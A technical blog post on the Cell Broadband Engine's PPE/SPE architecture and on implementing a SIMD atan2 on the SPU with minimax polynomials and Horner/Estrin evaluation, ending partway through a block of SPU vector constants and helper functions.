<li><p>IBM's <a target="_blank" href="https://web.archive.org/web/20100413024202/http://www.ibm.com/developerworks/power/cell/documents.html?S_TACT=105AGX16&amp;S_CMP=LP">CELL Broadband Engine Resource Center</a> (archive link), specifically the following docs</p>
<ul>
<li><p>Cell Broadband Engine Programmer's Guide</p>
</li>
<li><p>Cell Broadband Engine Programming Tutorial</p>
</li>
<li><p>Cell Broadband Engine Programming Handbook</p>
</li>
<li><p>SIMD Math Library Specification for Cell Broadband Engine Architecture</p>
</li>
<li><p>C/C++ Language Extensions for Cell Broadband Engine Architecture</p>
</li>
</ul>
</li>
<li><p><a target="_blank" href="https://files.maikxchd.com/cellbe-best-programming-20091211.pdf">The Best Programming Practice for Cell/BE</a> (self archive link) by Akira Tsukamoto (Sony CELL BE team)</p>
</li>
<li><p>This <a target="_blank" href="https://www.dentsubo.net/circle/spe256f.html">doujinshi</a> from Japan which contains the most detailed account of programming with CELL SPE cores, its in Japanese and fully absurd</p>
</li>
<li><p>That one guy from University of Indonesia (UI) Computer Science Faculty (Fasilkom) that said <code>i'm not a programmer</code> because i cannot do leetcode algorithms</p>
</li>
</ul>
<h1 id="heading-background">Background</h1>
<p>The Cell processor, developed by Sony, Toshiba, and IBM as part of the STI alliance, was an ambitious and highly unconventional processor design that promised extraordinary computational power. Introduced in the PlayStation 3 in 2006, the Cell architecture aimed to leverage the parallel processing capabilities of multiple specialized co-processors.</p>
<p>To understand why the CELL architecture is so weird, you need to understand that during the early 2000s the traditional approach of enhancing performance by increasing clock frequencies were reaching its limits. Intel's Pentium architecture could not evolve further, and its promised successor was nowhere to be found. Similarly, IBM's PowerPC G5 processors failed to deliver on the promised 3 GHz clock speed. People were calling this <a target="_blank" href="https://www.technologyreview.com/2000/05/01/236362/the-end-of-moores-law/">the end of Moore's law</a>.</p>
<p>While there <a target="_blank" href="https://en.wikipedia.org/wiki/Sch%C3%B6n_scandal">were alot of ideas</a> thrown around on how to fundamentally rework computing architectures to better scale performance, many thought that reworking the architecture from a monolithic processing design into a split-workload design where multiple smaller machines collaborate to distribute the compute task can work. This is similar to how we do cloud workloads today with microservices.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718424039668/84f32ec1-c242-4b7e-a880-cce30e5561fb.png" alt class="image--center mx-auto" /></p>
<p>The CELL's general-purpose "leader" core, known as the PowerPC Processing Element (PPE), was responsible for directing the overall operation of the CELL circuitry. It acted as the central processing unit, managing the workload and delegating tasks to the "assistant" cores.</p>
<p>The CELL architecture has been classified as a Network-on-Chip (NoC) rather than a traditional System-on-Chip (SoC) due to its unconventional data bus design, known as the Element Interconnect Bus (EIB). The EIB is a novel interconnect topology devised by IBM to address the performance bottlenecks and congestion issues faced by demanding CPU components in previous architectures.</p>
<p>Unlike traditional single bus topologies, the token ring topology employed by the EIB aims to tackle large amounts of concurrent traffic. Data is transferred in the form of 128-bit packets, and each ring can accommodate up to three concurrent transfers, provided that the packets do not overlap.</p>
<p>In addition to the EIB for networking different parts of the CELL architecture, the system incorporates several high-performance interfaces responsible for data movement and communication. These interfaces include:</p>
<ul>
<li><p><strong>Broadband Engine Interface Unit (BEI)</strong>: Responsible for facilitating communication between the CELL and external devices or systems.</p>
</li>
<li><p><strong>Memory Interface Controller (MIC)</strong>: Manages access to the main memory, with preferential priority on the EIB.</p>
</li>
<li><p><strong>Flex I/O buses</strong>: Provide additional I/O capabilities for the CELL architecture.</p>
</li>
</ul>
<h2 id="heading-powerpc-processing-unit-ppu"><strong>PowerPC Processing Unit (PPU)</strong></h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718424059218/b2f7780e-6ad6-436e-8722-a2c747102fbc.png" alt class="image--center mx-auto" /></p>
<p>The PPE, or Power Processing Element, is the general-purpose "leader" core of the CELL architecture. Unlike previous iterations where IBM adapted existing processors to meet new requirements, the PPE is a new CPU design specifically crafted for the CELL architecture. However, it is based on the PowerPC instruction set architecture (ISA) version 2.02, which was the last PowerPC specification before being rebranded as the Power ISA. The PPE shares a lineage with the PowerPC G5, as both are descendants of the POWER4 architecture, which was primarily used in workstations and supercomputers.</p>
<p>IBM's decision to leverage PowerPC technology for the PPE was driven by several factors. First, PowerPC was a mature platform with approximately 10 years of testing and refinement in the Macintosh user base, meeting Sony's requirements for the CELL architecture. Additionally, the PowerPC architecture could be adapted to different environments if needed. Crucially, the use of a well-known and established architecture provided compatibility with existing compilers and codebases, offering a significant advantage for a new console.</p>
<p>The PPE implements the PowerPC ISA version 2.02, including optional opcodes for floating-point square root operations . It has also been extended with a SIMD (Single Instruction, Multiple Data) instruction set called the <a target="_blank" href="https://arcb.csc.ncsu.edu/~mueller/cluster/ps3/SDK3.0/docs/accessibility/sdkpt/cbet_2vectsimd_ins.html">Vector/SIMD Multimedia Extension</a> (VMX). Notably, some elements from the original PowerPC specification are missing in the PPE, such as <a target="_blank" href="https://www.ibm.com/support/pages/just-faqs-about-little-endian">little-endian mode</a> (the CELL operates only in big-endian mode) and a handful of opcodes.</p>
<p>It's important to highlight that while the PPE leverages existing PowerPC technology, IBM constructed the PPE from the ground up, following the PowerPC 2.02 specification, rather than simply adapting an existing processor. This approach allowed IBM to optimize the PPE's design for the CELL's unique multi-core architecture and performance requirements, and also build interaction capabilities with the SPU.</p>
<h2 id="heading-synergistic-processing-unit-spu">Synergistic Processing Unit (SPU)</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718424118985/9e7a8ccc-f729-4217-af6e-e96f8c7f8efd.png" alt class="image--center mx-auto" /></p>
<p>The Synergistic Processor Unit (SPU) is programmed utilizing an instruction set architecture. While both the SPU and the PowerPC Processing Unit (PPU) adhere to the Reduced Instruction Set Computer (RISC), the SPU's ISA is proprietary and primarily composed of a Single Instruction Multiple Data (SIMD) instruction set. Consequently, the SPU features 128 128-bit general-purpose registers, which accommodate vectors comprising 32/16-bit fixed-point or floating-point values. Conversely, to conserve memory, SPU instructions are markedly compact, merely 32 bits in length. The initial segment contains the opcode, while the remaining portion can reference up to three operands to be computed in parallel.</p>
<p>This architecture bears resemblance to the preceding <a target="_blank" href="https://www.copetti.org/writings/consoles/playstation-2/#co-cpus">Vector Floating Point Unit</a> introduced in the PlayStation 2, albeit with substantial enhancements. For instance, developers are no longer required to learn a proprietary assembly language specific to the SPU, as IBM and Sony provided toolkits facilitating programming of the SPUs using C++, C, or assembly.</p>
<p>The SPEs are somewhat general-purpose coprocessors, not restricted to a single application, allowing them to assist the PPE in a wide range of tasks, provided that developers can program them properly. But the SPEs are more intended as the "assistant" cores of the CELL architecture, working in collaboration with the "leader" PPE to provide accelerated vector processing capabilities. By leveraging the SPEs' specialized design and local memory, the CELL architecture aims to offload computationally intensive tasks from the PPE, potentially achieving significant performance gains in applications that can take advantage of parallel processing and vector operations.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1718425837553/9e18aaee-d7bd-4e61-b186-8faf2a2bd381.png" alt class="image--center mx-auto" /></p>
<p>The core the SPE is the Synergistic Processor Unit (SPU), equivalent to the PPU in the PPE. But unlike the PPU, the SPU is isolated from the rest of the CELL architecture and does not have shared memory with the PPU or other SPUs. Instead, the SPU contains something called Local Memory (LS) used as a working space. However, the contents of this local memory can be moved back and forth using the Memory Flow Controller (MFC). In terms of functionality, the SPU is more limited compared to the PPU. It does not include memory management functions (address translation and memory protection) or advanced features like dynamic branch prediction. However, the SPU excels at vector processing operations. To program the SPU, developers use the PPU to invoke routines provided by the PlayStation 3's Operating System. These routines upload the executable specifically written for the SPU to the target SPU and signal it to start execution. After that, the PPU maintains a reference to the SPU's thread for synchronization purposes.</p>
<p>The Memory Flow Controller (MFC) is the component that interconnects the SPU with the rest of the CELL architecture, acting as an interface similar to the PowerPC Processor Storage Subsystem (PPSS) in the PPE. The primary function of the MFC is to move data between the SPU's local memory and the CELL's main memory, and to keep the SPU synchronized with its neighboring components. To perform its duties, the MFC embeds a Direct Memory Access (DMA) controller to handle communication between the Element Interconnect Bus (EIB) and the SPU's local memory. Additionally, the MFC houses another component called the Synergistic Bus Interface (SBI) that sits between the EIB and the DMA controller. The SBI is a complex piece of circuitry that interprets commands and data received from outside and signals the internal units of the SPE. As the front door to the CELL architecture, the SBI operates in two modes: bus master (where the SPE is adapted to request data from outside) or bus slave (where the SPE is set to receive orders from outside). It's worth noting that, considering the limit of EIB packets (up to 128-bit long), the MFC's DMA block can only move up to 16 KB of data per cycle. If the data transfer exceeds this limit, the EIB will throw a "Bus Error" exception during execution.</p>
<h1 id="heading-programing-for-the-cell-architecture">Programing for the CELL Architecture</h1>
<p>As the CELL architecture is radically different from regular PC architectures, it has been known to be very hard to program for (<a target="_blank" href="https://www.cnet.com/home/smart-home/sony-ps3-is-hard-to-develop-for-on-purpose/">by design</a>). Despite this, <a target="_blank" href="https://www.cresco.enea.it/LA1/cresco_sp14_ylichron/CBE-docs/CBE_Programming_Tutorial_v3.1.pdf">IBM p roposed</a> some ideas on how programmers can build applications in the CELL architecture.</p>
<h2 id="heading-ppe-centric-approaches">PPE-centric Approaches</h2>
<p>These approaches place the primary computational responsibilities on the PPE, treating the SPEs as co-processors or accelerators to offload specific tasks or workloads. There are three main patterns within this category:</p>
<ol>
<li><p>Multistage Pipeline Model:</p>
<ul>
<li><p>The PPE acts as the driver, sending work to a single SPE.</p>
</li>
<li><p>Each SPE performs its assigned computations and passes the results to the next SPE in a pipeline fashion. The final SPE in the chain sends the processed data back to the PPE.</p>
</li>
<li><p>This model is not recommended for primary tasks due to the high inter-SPE communication overhead and complexity in managing the pipeline.</p>
</li>
</ul>
</li>
<li><p>Parallel Stages Model:</p>
<ul>
<li><p>The PPE decomposes the main task into independent sub-tasks.</p>
</li>
<li><p>Each sub-task is assigned to a different SPE for parallel execution. SPEs return their processed results to the PPE upon completion.</p>
</li>
<li><p>The PPE combines the results from all SPEs to produce the final output.</p>
</li>
<li><p>This approach can be effective for heavily parallelized workloads with minimal data dependencies.</p>
</li>
</ul>
</li>
<li><p>Services Model:</p>
<ul>
<li><p>Each SPE is assigned a specific service or job (e.g., audio decoding, video encoding, physics calculations). Service assignments to SPEs can be dynamically adjusted based on the program's changing requirements.</p>
</li>
<li><p>The PPE acts as a job dispatcher, sending input data to the appropriate SPE based on the required service. While awaiting results, the PPE can perform other tasks or manage system resources.</p>
</li>
<li><p>This model is suitable for applications with distinct, well-defined tasks that can be offloaded to dedicated SPEs.</p>
</li>
</ul>
</li>
</ol>
<h2 id="heading-spe-centric-approaches">SPE-centric Approaches</h2>
<p>In contrast to the PPE-centric models, SPE-centric approaches place a greater emphasis on the SPEs as the primary computational engines, with the PPE playing a supporting role in resource management and coordination.</p>
<ul>
<li><p>Using their internal Direct Memory Access (DMA) units, SPEs directly fetch and execute tasks stored in main memory.</p>
</li>
<li><p>The PPE is responsible for initially setting up these tasks in memory and allocating them to the appropriate SPEs. Once the SPEs begin executing their assigned tasks, the PPE's involvement is minimized, allowing the SPEs to operate with a high degree of autonomy.</p>
</li>
<li><p>This approach can potentially unlock higher levels of parallelism and efficiency, as the SPEs are not constrained by frequent communication with the PPE.</p>
</li>
<li><p>However, it also introduces challenges in terms of data partitioning, synchronization, resource management, fault tolerance, and portability to other architectures.</p>
</li>
</ul>
<h2 id="heading-hybrid-approaches">Hybrid Approaches</h2>
<p>In practice, many applications may benefit from a hybrid approach that combines elements of both PPE-centric and SPE-centric models. For example:</p>
<ul>
<li><p>The PPE could handle high-level task management and coordinate the overall workflow. While computationally intensive or parallelizable workloads could be offloaded to the SPEs using an SPE-centric model.</p>
</li>
<li><p>The PPE could also perform pre-processing or post-processing tasks on the data before or after the SPE computations.</p>
</li>
<li><p>Communication and data transfer between the PPE and SPEs could be minimized by strategically partitioning the workload and leveraging DMA transfers.</p>
</li>
</ul>
<p>The choice of programming style depends on various factors, including the nature of the application, performance requirements, data dependencies, and the development team's familiarity with the Cell BE architecture and programming models.</p>
<p>While the heterogeneous multi-core architecture of the Cell BE offered significant computational power, programming it effectively presented several challenges that developers had to overcome:</p>
<ol>
<li><p>Code Partitioning and Load Balancing:</p>
<ul>
<li><p>Determining the optimal partitioning of code and data between the PPE and SPEs was crucial for maximizing performance.</p>
</li>
<li><p>Load balancing the workload across the SPEs to avoid bottlenecks and ensure efficient utilization of resources was a complex task.</p>
</li>
<li><p>Developers had to carefully analyze data dependencies, communication patterns, and computational requirements to make informed partitioning decisions.</p>
</li>
</ul>
</li>
<li><p>Memory Management and Data Transfers:</p>
<ul>
<li><p>Each SPE had a limited local store (256 KB) for instructions and data, necessitating careful memory management. Data transfers between main memory and SPE local stores had to be orchestrated efficiently using DMA transfers to minimize stalls and bottlenecks.</p>
</li>
<li><p>Techniques like double-buffering and software caching were often employed to overlap computation with data transfers.</p>
</li>
</ul>
</li>
<li><p>SIMD Vectorization:</p>
<ul>
<li><p>The SPEs featured a SIMD instruction set, enabling parallel operations on vectors of data. To fully leverage the SIMD capabilities, developers had to vectorize their code, which involved restructuring algorithms and data layouts to expose parallelism.</p>
</li>
<li><p>Compiler auto-vectorization support was limited, often requiring manual vectorization efforts by developers.</p>
</li>
</ul>
</li>
<li><p>Branch Prediction and Control Flow:</p>
<ul>
<li><p>The SPEs lacked dynamic branch prediction hardware, making control-intensive code with unpredictable branches less efficient.</p>
</li>
<li><p>Developers had to employ techniques like software pipelining, predication, and branch hint instructions to mitigate the impact of branch mispredictions.</p>
</li>
</ul>
</li>
<li><p>Synchronization and Communication:</p>
<ul>
<li><p>Coordinating the execution and communication between the PPE and multiple SPEs required careful synchronization mechanisms to avoid race conditions and ensure data coherency.</p>
</li>
<li><p>Efficient inter-core communication protocols and messaging schemes had to be implemented, often leveraging mailboxes, signal notifiers, and DMA transfers.</p>
</li>
</ul>
</li>
<li><p>Debugging and Profiling:</p>
<ul>
<li><p>Debugging and profiling parallel applications on the heterogeneous Cell BE architecture posed challenges due to the distributed nature of execution and limited visibility into the SPEs.</p>
</li>
<li><p>Specialized debugging and profiling tools were developed by IBM, Sony, and third-party vendors to aid developers in identifying performance bottlenecks and optimizing their applications.</p>
</li>
</ul>
</li>
</ol>
<p>Which gives us alot of challenges to work with, but some very interesting opportunities to leverage coding styles and trickery with C that many might be unfamiliar when working with typical x86 binaries.</p>
<h1 id="heading-understanding-the-mathematics">Understanding the Mathematics</h1>
<p>The atan2 function, which computes the angle between the positive x-axis and a vector (x, y) in the Cartesian plane, is a fundamental operation in various scientific and engineering applications, such as computer graphics, robotics, and signal processing.</p>
<p>Mathematically, the arctangent function is expressed as:</p>
<p>$$atan(x) = θ, tan(θ) = x$$</p><p>The range of the arctangent function is typically [-π/2, π/2] radians, or [-90°, 90°] degrees. However, in many applications, it is desirable to have the full range of [-π, π] radians, or [-180°, 180°] degrees. This is achieved by considering the signs of both the input x and y values, leading to the atan2(y, x) function, which is a variation of the arctangent function.</p>
<p>The atan2(y, x) function computes the angle (in radians) between the positive x-axis and the vector (x, y) in the Cartesian plane. It is defined as:</p>
<p>$$atan2(y, x) = arctan(y/x)$$</p><p>The first step in computing atan2 is to reduce the input arguments (x, y) to a specific range using well-known trigonometric identities. This process, known as argument reduction, simplifies the subsequent computation by limiting the input domain to a narrow interval. For atan2, the following identities are commonly used:</p>
<ul>
<li><p>atan2(-y, x) = -atan2(y, x)</p>
</li>
<li><p>atan2(y, -x) = π - atan2(y, x)</p>
</li>
<li><p>atan2(y, x) = π/2 - atan2(x, y) for |y| &gt; |x|</p>
</li>
</ul>
<p>Once the input arguments have been reduced, the core computation involves evaluating the atan(y/x) function on the reduced range. A common approach is to use a minimax polynomial approximation, which provides an accurate approximation of the function over a narrow interval.</p>
<p>Minimax polynomial approximation is a technique used in numerical analysis to find a polynomial 𝑃(𝑥) of a given degree 𝑛<em>n</em> that closely approximates a function 𝑓(𝑥) over a specified interval [𝑎,𝑏]. The primary objective of this method is to minimize the maximum absolute deviation between the polynomial approximation and the function across the interval. This is quantified as:</p>
<p>$$\max_{x \in [a, b]} |f(x) - P(x)|$$</p><p>Where the left-hand side represents the peak absolute error. The polynomial 𝑃(𝑥)<em>P</em>(<em>x</em>) is chosen to minimize this maximum error, hence the term "minimax". The polynomial approximation can be expressed as:</p>
<p>$$P(x) = c_0 + c_1 (x - x_0) + c_2 (x - x_0)^2 + \ldots + c_n (x - x_0)^n$$</p><p>Here, 𝑥0​ typically represents a central point within the interval [𝑎,𝑏], often the midpoint, which can be strategically chosen to reduce computational complexity or improve the symmetry of the error distribution. The constants 𝑐0,𝑐1,…,𝑐𝑛 are the coefficients of the polynomial, determined so as to achieve the minimax objective.</p>
<p>The Remez exchange algorithm is a popular method used to compute these coefficients. It iteratively adjusts the coefficients and the set of points at which the maximum error occurs, seeking to equalize the error at these points and minimize its peak value. This algorithm is particularly well-suited for finding minimax solutions due to its efficiency in handling the non-linear nature of the problem.</p>
<p>The evaluation of the minimax polynomial approximation is a critical component of the overall atan2 implementation. Two common techniques for efficient polynomial evaluation are Horner's scheme and Estrin's scheme.</p>
<p><a target="_blank" href="https://en.wikipedia.org/wiki/Horner%27s_method">Horner's scheme</a> is a numerically stable algorithm for polynomial evaluation that minimizes the number of multiplications. Given a polynomial of degree 𝑛:</p>
<p>$$P(x) = a_n x^n + a_{n-1} x^{n-1} + \ldots + a_1 x + a_0$$</p><p>Horner’s scheme reformulates this polynomial as:</p>
<p>$$P(x) = (((\ldots(a_n x + a_{n-1}) x + a_{n-2}) \ldots ) x + a_1) x + a_0$$</p><p>This nested multiplication approach reduces the computational complexity from O(n^2) operations (if computed naively) to O(n) multiplications and O(n) additions, thus enhancing efficiency, especially for large 𝑛. This scheme is particularly effective for sequential processing environments because it sequentially updates the result and requires maintaining only a single accumulator during computation.</p>
<p><a target="_blank" href="https://en.wikipedia.org/wiki/Estrin%27s_scheme">Estrin's scheme</a>, on the other hand, is a factored form of the polynomial that can be evaluated using a series of fused multiply-add (FMA) instructions. While Estrin's scheme typically requires more instructions than Horner's scheme, it can exploit instruction-level parallelism more effectively, potentially improving performance on superscalar architectures like the CELL SPE. Like Horner's, it reduces the polynomial evaluation complexity but does so in a way that allows for concurrent execution of operations. For the same polynomial 𝑃(𝑥)<em>P</em>(<em>x</em>), Estrin's scheme groups terms to enable parallel computation:</p>
<p>$$P(x) = (((\ldots(a_n x^2 + a_{n-1}) x^2 + a_{n-2}) \ldots ) x^2 + a_1) x + a_0$$</p><p>However, this representation typically works best for polynomials where the degree is a power of two, allowing balanced splitting. If 𝑛 is not a power of two, dummy terms with coefficients of zero may be added to fit this scheme. Estrin’s method is particularly beneficial on architectures that support instruction-level parallelism and fused multiply-add (FMA) instructions, allowing multiple operations to be performed simultaneously.</p>
<h1 id="heading-design-considerations-of-the-code">Design Considerations of the Code</h1>
<p>By combining careful algorithm design alongside many optimization techniques, significant performance gains can be achieved for atan2 computation on the CELL SPE processor.</p>
<h2 id="heading-using-local-store-memory">Using Local Store Memory</h2>
<p>The CELL BE had a heterogeneous multi-core architecture consisting of one PowerPC-based Power Processing Element (PPE) and eight specialized co-processors called Synergistic Processing Elements (SPEs). Each SPE had its own Synergistic Processing Unit (SPU) and a small local memory (256 KB) referred to as the Local Store (LS).</p>
<p>The SPU's LS is a high-speed scratchpad memory, and it is designed to be the primary working memory for the SPU. Data had to be explicitly transferred between the main system memory and the LS using Direct Memory Access (DMA) operations, as the SPU could not directly access the main memory.</p>
<p>The LS in the Cell BE SPEs is fundamentally different from a normal hardware cache as it is a software-managed memory, meaning that the programmer has explicit control over data transfers between the LS and the main memory using DMA operations. In contrast, a hardware cache is transparent to the programmer and automatically managed by the processor's memory management unit (MMU).</p>
<p>The LS also doesn't sync with the main memory or other LS. Data consistency must be explicitly managed by the programmer through DMA transfers and synchronization primitives. On the other hand, hardware caches maintain coherency with the main memory and other caches in the system, transparently to the programmer.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Global Floating-point constants (32 bit)</span>

<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_pio4 = { <span class="hljs-number">0x3f490fdb</span>, <span class="hljs-number">0x3f490fdb</span>, <span class="hljs-number">0x3f490fdb</span>, <span class="hljs-number">0x3f490fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_t3p8 = { <span class="hljs-number">0x3fe5ec5d</span>, <span class="hljs-number">0x3fe5ec5d</span>, <span class="hljs-number">0x3fe5ec5d</span>, <span class="hljs-number">0x3fe5ec5d</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_npio2 = { <span class="hljs-number">0xbfc90fdb</span>, <span class="hljs-number">0xbfc90fdb</span>, <span class="hljs-number">0xbfc90fdb</span>, <span class="hljs-number">0xbfc90fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_pio2 = { <span class="hljs-number">0x3fc90fdb</span>, <span class="hljs-number">0x3fc90fdb</span>, <span class="hljs-number">0x3fc90fdb</span>, <span class="hljs-number">0x3fc90fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_pt66 = { <span class="hljs-number">0x3f2aaaab</span>, <span class="hljs-number">0x3f2aaaab</span>, <span class="hljs-number">0x3f2aaaab</span>, <span class="hljs-number">0x3f2aaaab</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_pi = { <span class="hljs-number">0x40490fdb</span>, <span class="hljs-number">0x40490fdb</span>, <span class="hljs-number">0x40490fdb</span>, <span class="hljs-number">0x40490fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_npi = { <span class="hljs-number">0xc0490fdb</span>, <span class="hljs-number">0xc0490fdb</span>, <span class="hljs-number">0xc0490fdb</span>, <span class="hljs-number">0xc0490fdb</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_morebits = { <span class="hljs-number">0x38800000</span>, <span class="hljs-number">0x38800000</span>, <span class="hljs-number">0x38800000</span>, <span class="hljs-number">0x38800000</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_hmorebits = { <span class="hljs-number">0x34000000</span>, <span class="hljs-number">0x34000000</span>, <span class="hljs-number">0x34000000</span>, <span class="hljs-number">0x34000000</span> };

<span class="hljs-comment">// Helper functions to load constant values into quadwords</span>
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flpio4</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_pio4); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flt3p8</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_t3p8); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flnpio2</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_npio2); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flpio2</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_pio2); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flpt66</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_pt66); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flpi</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_pi); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_flnpi</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_lqa((<span class="hljs-keyword">intptr_t</span>)&amp;_cp_f_npi); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filzero</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x0000</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filnzero</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x8000</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filone</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x3f80</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filtwo</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x4000</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filinf</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x7f80</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filninf</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0xff80</span>); }
<span class="hljs-function"><span class="hljs-keyword">static</span> <span class="hljs-keyword">inline</span> qword <span class="hljs-title">cp_filnan</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span> </span>{ <span class="hljs-keyword">return</span> si_ilhu((<span class="hljs-keyword">int16_t</span>)<span class="hljs-number">0x7fc0</span>); }

<span class="hljs-comment">// Polynomial coefficients for cp_fatan approximation</span>
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p7 = { <span class="hljs-number">0x3c08876a</span>, <span class="hljs-number">0x3c08876a</span>, <span class="hljs-number">0x3c08876a</span>, <span class="hljs-number">0x3c08876a</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p6 = { <span class="hljs-number">0xbd954629</span>, <span class="hljs-number">0xbd954629</span>, <span class="hljs-number">0xbd954629</span>, <span class="hljs-number">0xbd954629</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p5 = { <span class="hljs-number">0x3f8a07c1</span>, <span class="hljs-number">0x3f8a07c1</span>, <span class="hljs-number">0x3f8a07c1</span>, <span class="hljs-number">0x3f8a07c1</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p4 = { <span class="hljs-number">0xbf49eee6</span>, <span class="hljs-number">0xbf49eee6</span>, <span class="hljs-number">0xbf49eee6</span>, <span class="hljs-number">0xbf49eee6</span> };
<span class="hljs-keyword">static</span> <span class="hljs-keyword">const</span> <span class="hljs-built_in">vector</span> <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> _cp_f_atan_p3 = { <span class="hljs-number">0x3ee4f8b5</span>, <span class="hljs-number">0x3ee4f8b5</span>, <span class="hljs-number">0x3ee4f8b5</span>, <span class="hljs-number">0x3ee4f8b5</span> };
